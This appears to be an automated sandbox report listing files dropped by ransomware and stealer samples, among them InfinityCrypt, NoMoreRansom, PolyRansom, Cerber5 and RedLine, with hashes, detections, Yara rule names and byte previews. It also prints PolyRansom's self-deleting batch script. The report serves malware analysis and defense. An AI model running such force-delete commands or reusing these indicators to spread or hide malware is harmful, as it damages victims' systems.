                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):384
                                                                                                                                                Entropy (8bit):7.4513299081032045
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:9Yb6jDuK/On7zP9wA48n9Q7wMenasVdCafWYT5J2kyEI2QB2Nj3oYFdIEWQlvko1:9sXkQr28ny0M/JgGkLItCoYFdIcvkodv
                                                                                                                                                MD5:6E8F5BE4489767A23FBFA0A394CA96F3
                                                                                                                                                SHA1:3DBCF19A2ECA5BDACDD9AF55998B5D8E884FF404
                                                                                                                                                SHA-256:270D1FA22424438C4847888A141695E1839C3EAD6C869F9FBD3CA2988F0E420A
                                                                                                                                                SHA-512:481DDC54127DC2BF1711256C1A6D3D8A46A91619CB551F76D2D909BF8E72E4AD244AA445C654210367A6138FB35ABC27A96D47E66C7BA52EA98695DBA7F3E6DF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J...W.V).3 ?1....<...w..i.]........,..S...............N,V.....*.f.#..Ji=.RDD%#=-...u.Q..^.WO..7..'}.dT.[#.&.0....s..??...}..k..lv.sL.Fy..rmU..{..]T.....U.~w....j..nX.#.x7C.Z...F...).B...j@..i......2...=q*T+n.n4...D#.1
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):192
                                                                                                                                                Entropy (8bit):6.970175521464357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tDABAmHnSVpbKEWmwRmn/XYE0DOGQ0pfJLyPr7JBzT2KZrCY3skfrTrDJvnhdYMa:amQS3bXWJm/I7OGppfJLyPfvTtZrCYcl
                                                                                                                                                MD5:819F2D8E39F1DD13A774E7362B63A4BB
                                                                                                                                                SHA1:7E5490AF156933FBB0D333D28B5887668C8F7987
                                                                                                                                                SHA-256:D373C1BDC4F3E32B3935BFF3F4C07BD3D3870EF3609B5DBC137830D0062C618B
                                                                                                                                                SHA-512:031C44004FB0E4B7F7C424AC657D81E3AA35E058E3D2F77E78D1C6388E13EFA216B48874A08B37DB8021B2E3F0568E0A9E85657911F7741B622A190964D97CF9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.j$.J,d ....C.....\|k.u.I.g%PP.8.1.g.....].:-.i.3.S...C6.a.U....|..8..B..'+Z."S...`..%.zj...L.-+*.....P..m.1X(..c..(~.'.D@?..4?k..|.....T=......u....[g..T.L3.F0...8...l....E.N.[..{..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):192
                                                                                                                                                Entropy (8bit):6.941478776650154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:tDABAmHnSVpbKEWmwRmn/XYE0DOGQ0pfJLyPruj8Wgi00gk3WJvkVTHCe6Pp3pu4:amQS3bXWJm/I7OGppfJLyPMp5Z3WJvkS
                                                                                                                                                MD5:DB352325902A42FABB5657D411E27A29
                                                                                                                                                SHA1:17E05A8E45EAA62F060D483A258BEAF39DAF5735
                                                                                                                                                SHA-256:70DA3AF65B4ADF4F8BF277906B3AD368BC9BA936DF886C203E2696F46FE6B6C2
                                                                                                                                                SHA-512:572E0345D584064B19283BA7540575EDC4F2738C18E0D6A0F17AA342453738E5F650227BAFB38AE215F4EF235973F12D60A2DACD34F02C05AD1349CF695F5AB0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.j$.J,d ....C.....\|k.u.I.g%PP.8.1.g.....].:-.i.3.S...C6.a.U....|..8..B..'+Z."S...`..%.zj...L.-+*.....P..m.1....P7.?...L.v#.....-...B.....@|.i....J...b.!......h..q..K.*.N.;R.?C...%W...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):176
                                                                                                                                                Entropy (8bit):6.983440496416754
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:HddtgDH6jDuK/mvt7nT3z/XP12pNsArU3I8nvVXQyowip0nYmtJ2ps3ljO9g5v:9Yb6jDuK/On7zP9wA48n9Q7wMenasVyC
                                                                                                                                                MD5:7919A8EC74A9A940DCC7BCC847524F46
                                                                                                                                                SHA1:150D4C3DD65F7892EA35F322D29E1F750D6BEEB5
                                                                                                                                                SHA-256:FDDDBA13D09F70C7554605F42EAEBA7493CDDE9D93CC79ECAD427F87DFBC7875
                                                                                                                                                SHA-512:AEEAAC021D75827DF6B953BE9C8F3A83ACD46F47958723A1A8AD3E756AEF3EA303C8E5D7DF234B77B693E676DB558BA1E66D64BE6C39B3ABD5D61014E74A08CA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J.~F......ddD.-k..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):352
                                                                                                                                                Entropy (8bit):7.409896259344944
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:9Yb6jDuK/On7zP9wA48n9Q7wMenasVpSLiNIDxyVIIdq0lHfZie5g/TTVkGgh:9sXkQr28ny0M/EaVyVIIN/Zn5g/TTD4
                                                                                                                                                MD5:CFE28777C620DBEA3F5825D6AD394BF3
                                                                                                                                                SHA1:88C96C5EC3294F3F5FBA3413D19C13654378897A
                                                                                                                                                SHA-256:91868DE9FDFE1813816F7ED5FF56A7AF8A412A775924EC1C9200633FDAC5FADD
                                                                                                                                                SHA-512:9D7AD572F22B92210725B53A175FC93CC67DEE39937356B0BC78D5826834DA373AEEC7F0CB46E9A2541CEC1DA0891C887CD34378664420A0A1611CFB51DF3FA9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:1;;'.4H..........(........8...#...2C|.^U.@u....I.pG^.....T.n..]|L.3...:l.WB9!.Y.*.....i.q..y............5_..p.X...r.u..=.5..j....W...vm.A.tC...y......J..fF...I..W.iu..t.8<.PE.G.`@.~...T..D....y d..mE#..q&..4.,.l+.....mmx.x.3...q.>.Mp.Ju..[-..<.po..2..T..p*]U...Up..n.s..`b9........9.R...n-......ZRPH....u.5&..N.$~.f}.Vo..J{S!.8q...........*..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1427968
                                                                                                                                                Entropy (8bit):6.856188310924527
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):183808
                                                                                                                                                Entropy (8bit):7.797165672261099
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:2RVsoRYavfn85qlcOk8kEoQhdz0VoTvYGAKBLtiRefqAVmKOkB3VKL:g1R9380lcOh3o4z0VoTvYDRIikBFK
                                                                                                                                                MD5:0D6D628F4EAEA4532B8F79E83D4CF413
                                                                                                                                                SHA1:7F4555DA5C5FBA6F0055C122A814F331E9D8FF32
                                                                                                                                                SHA-256:3B2A54CE26E3D081870EDC80BCF11B5289824BDD3C24B80810001C6733E50CC6
                                                                                                                                                SHA-512:66C065529B09D634BEF86D92EF9E45EFBC61D356E387E8C9F02B9D95C134C74F76760B603913D42011EAEF5B4F02D94404FEC77304D9F86FEE6A4E3524D8301C
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@..................................................................................................................................................................................................text............................... ...................................................~.....#.hcb.....%M...7N.V..Z.tX._.........U.].....]Bl.AaBj.[....r..tO!.V.:t.{.....A"m.L..5..(.....O...2...s...H....B..&.h.....h..l.H...si.7.UT.y.....4.q._F..K..X..b..;Y.].P...;.[e.M...@...`.V*..xs....;Q..>..C;.....#>...LW"......{.^B..&......^\...Io....##g......\.....%3.\.FG.t.u...T....y.o.^.6..aNr.Tr.R.....h.........`........=......P..........U[C.}..Y.#tM.........B..f...Y.. ?K-...D~..<].H....H.M0.G..e.p.T.\.JR.'E.*!...........By....XX._0C.#7..=Y..^,...A.~.
                                                                                                                                                Process:C:\ProgramData\vsMwMYIk\LOAcQQUU.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:0:0
                                                                                                                                                MD5:EB877C12705506D1E4EED9B6AD6F50F7
                                                                                                                                                SHA1:F2A05246BC5B5CEB7689B08BFA5CF4A11534EED5
                                                                                                                                                SHA-256:754F881FF318DEE05C601A9ECCCA0AC702303B9A75D8618C45104BA3CA4CDF70
                                                                                                                                                SHA-512:519D0658E3B6BFC79476B29CDFC5B04991246EB76E40B9413C38C68DEA7DB5990BCE6B0F1DF8881C740A2CE0FC8C06267F56E335A74978564B5EF166523924F9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..6c
                                                                                                                                                Process:C:\Windows\dispci.exe
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Sep 29 20:48:31 2022, mtime=Thu Sep 29 20:48:48 2022, atime=Thu Sep 29 20:48:31 2022, length=142848, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):725
                                                                                                                                                Entropy (8bit):4.723740425377673
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8iHnjKQm/etDlxDlwEXgr+VJ3YfKf/99jAXR6W+IWgL6CNbwyMg5yMXILYum:8+j+O7lwXCfoifrAXl+IWt2bxMg8MXyu
                                                                                                                                                MD5:B130175219A56F12144025AF41A070FA
                                                                                                                                                SHA1:69E55688124ABA48DB7BCB2663C743782D48D6F0
                                                                                                                                                SHA-256:48CF171144B68266122E03DFE95FCB044190A306BBB837DA287C5D81E2528D5A
                                                                                                                                                SHA-512:D45D094B5D1E727EC5FB969AE3A04933AAB46B7D85E352396FD53C2F25C663EACC8EB2548C1CD29E1106D20CDB62ED412042BDBC83708411C0411C51D37B40CD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:L..................F.... ......7M...*.AM....A.7M................................P.O. .:i.....+00.../C:\...................V.1.....=U....Windows.@......L..=U.............................0.W.i.n.d.o.w.s.....`.2.....=U.. .dispci.exe..F......=U..=U.......E..../...............Q.0.d.i.s.p.c.i...e.x.e.......D...............-.......C...................C:\Windows\dispci.exe....D.E.C.R.Y.P.T.......\.....\.....\.W.i.n.d.o.w.s.\.d.i.s.p.c.i...e.x.e.........$..................C..B..g..(.#....`.......X.......899552...........!a..%.H.VZAj.................-..!a..%.H.VZAj.................-........A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):267776
                                                                                                                                                Entropy (8bit):7.535290233283343
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:vDKW1LgppLRHMY0TBfJvjcTp5XxG8pt+oSOpE22obq+NYgvPuCEbMBWJxLRiUgV:vDKW1Lgbdl0TBBvjc/M8n35nYgvKjdzi
                                                                                                                                                MD5:7D80230DF68CCBA871815D68F016C282
                                                                                                                                                SHA1:E10874C6108A26CEEDFC84F50881824462B5B6B6
                                                                                                                                                SHA-256:F4234A501EDCD30D3BC15C983692C9450383B73BDD310059405C5E3A43CC730B
                                                                                                                                                SHA-512:64D02B3E7ED82A64AAAC1F74C34D6B6E6FEAAC665CA9C08911B93EDDCEC66595687024EC576E74EA09A1193ACE3923969C75DE8733859835FEF45335CF265540
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, Author: ditekSHen
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                • Antivirus: Metadefender, Detection: 66%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................W....PE..L...t..P..........#..........z....../.............@..........................`.......;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):216064
                                                                                                                                                Entropy (8bit):3.1340875869032985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                                                                MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                                                                SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                                                                SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1427968
                                                                                                                                                Entropy (8bit):6.856188310924527
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):835669
                                                                                                                                                Entropy (8bit):7.967994410818332
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:De/2dxVZ+ivtwdeOkD5YNfEp5UOc1+A4cMfZIYMlBlfwFyfr7BM9G/9V:6/iBFSkyNfI51cQFhMlvIofZRn
                                                                                                                                                MD5:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                SHA1:9180D2CE387314CD4A794D148EA6B14084C61E1B
                                                                                                                                                SHA-256:312F082EA8F64609D30FF62B11F564107BF7A4EC9E95944DFD3DA57C6CDB4E94
                                                                                                                                                SHA-512:F47B05B9C294688811DD72D17F815CCE6C90F96D78F6835804D5182E2F4BFBD2D6738DE854B8A79DEA6345F9372BA76A36920E51E6CB556EF4B38B620E887EB4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].,.].,.].,.%f,.].,.%p,.].,.%`,.].,.].,.\.,.%w,.].,.,.].,.%g,.].,.%b,.].,Rich.].,................PE..L...G._U.................D....W..............`....@..........................``.............................................(.........`..G...........................................................................`..x............................text...VC.......D.................. ..`.rdata.......`.......H..............@..@.data...0.V..@...H...$..............@....data2..x.....`......l..............@....rsrc....G....`..H...x..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):320760
                                                                                                                                                Entropy (8bit):6.315890725389197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                                                                MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                                                                SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                                                                SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                • Antivirus: Metadefender, Detection: 76%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):199
                                                                                                                                                Entropy (8bit):4.746923186087672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:SbdWwxXWJceCDBnXr87+QVe2vwR/EtbWCd8IJcs:bwxXWw9Xr87HVBvwNibv
                                                                                                                                                MD5:DCF6443A0DE6A5008DC5AFCDACAEC6ED
                                                                                                                                                SHA1:2518694216461699273EB426BC12B673BBBD2ED8
                                                                                                                                                SHA-256:41D33E607FE26FB20168769E244D738556D3F9CF1FDF1C5F12AE350CFAA26375
                                                                                                                                                SHA-512:5B306F579A8A799B711BCA273372E8AC985599FDFE6446104CC7B63301A557ED72624B6BAAFF462565EE9EC2047044CD952508EA06B7F8C702B2486EF3BBE455
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:# Tor state file last generated on 2022-09-29 14:49:17 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.5.10..LastWritten 2022-09-29 21:49:17..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):199
                                                                                                                                                Entropy (8bit):4.746923186087672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:SbdWwxXWJceCDBnXr87+QVe2vwR/EtbWCd8IJcs:bwxXWw9Xr87HVBvwNibv
                                                                                                                                                MD5:DCF6443A0DE6A5008DC5AFCDACAEC6ED
                                                                                                                                                SHA1:2518694216461699273EB426BC12B673BBBD2ED8
                                                                                                                                                SHA-256:41D33E607FE26FB20168769E244D738556D3F9CF1FDF1C5F12AE350CFAA26375
                                                                                                                                                SHA-512:5B306F579A8A799B711BCA273372E8AC985599FDFE6446104CC7B63301A557ED72624B6BAAFF462565EE9EC2047044CD952508EA06B7F8C702B2486EF3BBE455
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:# Tor state file last generated on 2022-09-29 14:49:17 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.5.10..LastWritten 2022-09-29 21:49:17..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22016
                                                                                                                                                Entropy (8bit):6.659180163384805
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:F9+aLp4ojrenkfVyL9NulYyAwX0uokwqwA8Xb6Pk5tOIdZy+kA4nk5tOIdZy+kLQ:qmp5tQClYyAwwePk5t50nk5t5bl31
                                                                                                                                                MD5:FEC89E9D2784B4C015FED6F5AE558E08
                                                                                                                                                SHA1:581FD9FB59BD42FBE7BD065CF0E6FF6D4D0DABA2
                                                                                                                                                SHA-256:489F2546A4AD1E0E0147D1CA2FD8801785689F67FB850171CCBAA6306A152065
                                                                                                                                                SHA-512:E3BBF89CC0A955A2819455137E540952C55F417732A596EF314A46D5312B3BED644AC7595F75D3639EBC30E85F0F210DBA0EF5B013D1B83BAFD2C17A9D685A24
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.W.........."...0..L...........k... ........@.. ....................................@..................................k..O...................................Hj............................................... ............... ..H............text....K... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B.................k......H.......`$..............(9.. 1............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rG..p~....o....t....*.~....*..(....*Vs....(....t.........*6.(.....(....*.*^.ra..p(....o.....(....*..0..........s.......}......}.....{.......&...%.rq..p.%.(.....%.(.....%.(.....%.(.....%.(.....%.(.....%.(.....%..|....(.....%..r...p.%..(.....%..r...p.( ...o!...s"...% ....o#...%.......s$...o%...o&...*z.,..{....,..{....o'.....((...*..0..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):112
                                                                                                                                                Entropy (8bit):4.768536250532167
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:jGknQngol9LL3BGc2moKY9LL32JCK0rSgK0/o+0K0+ov:6kqgAbBGdmoKWb/egXo+03
                                                                                                                                                MD5:BAE1095F340720D965898063FEDE1273
                                                                                                                                                SHA1:455D8A81818A7E82B1490C949B32FA7FF98D5210
                                                                                                                                                SHA-256:EE5E0A414167C2ACA961A616274767C4295659517A814D1428248BD53C6E829A
                                                                                                                                                SHA-512:4E73A24161114844D0E42C44C73205C4A57FA4169BD16C95FB7E9D6D5FCDF8BD01741541C77570556AC1F5EE260DA67A9041F40381B6C6E0601C9DE385BDC024
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:echo WScript.Sleep(50)>%TEMP%/file.vbs..cscript %TEMP%/file.vbs..del /F /Q file.js..del /F /Q %1..del /F /Q %0..
                                                                                                                                                Process:C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):199168
                                                                                                                                                Entropy (8bit):7.816608369359199
                                                                                                                                                Encrypted:false
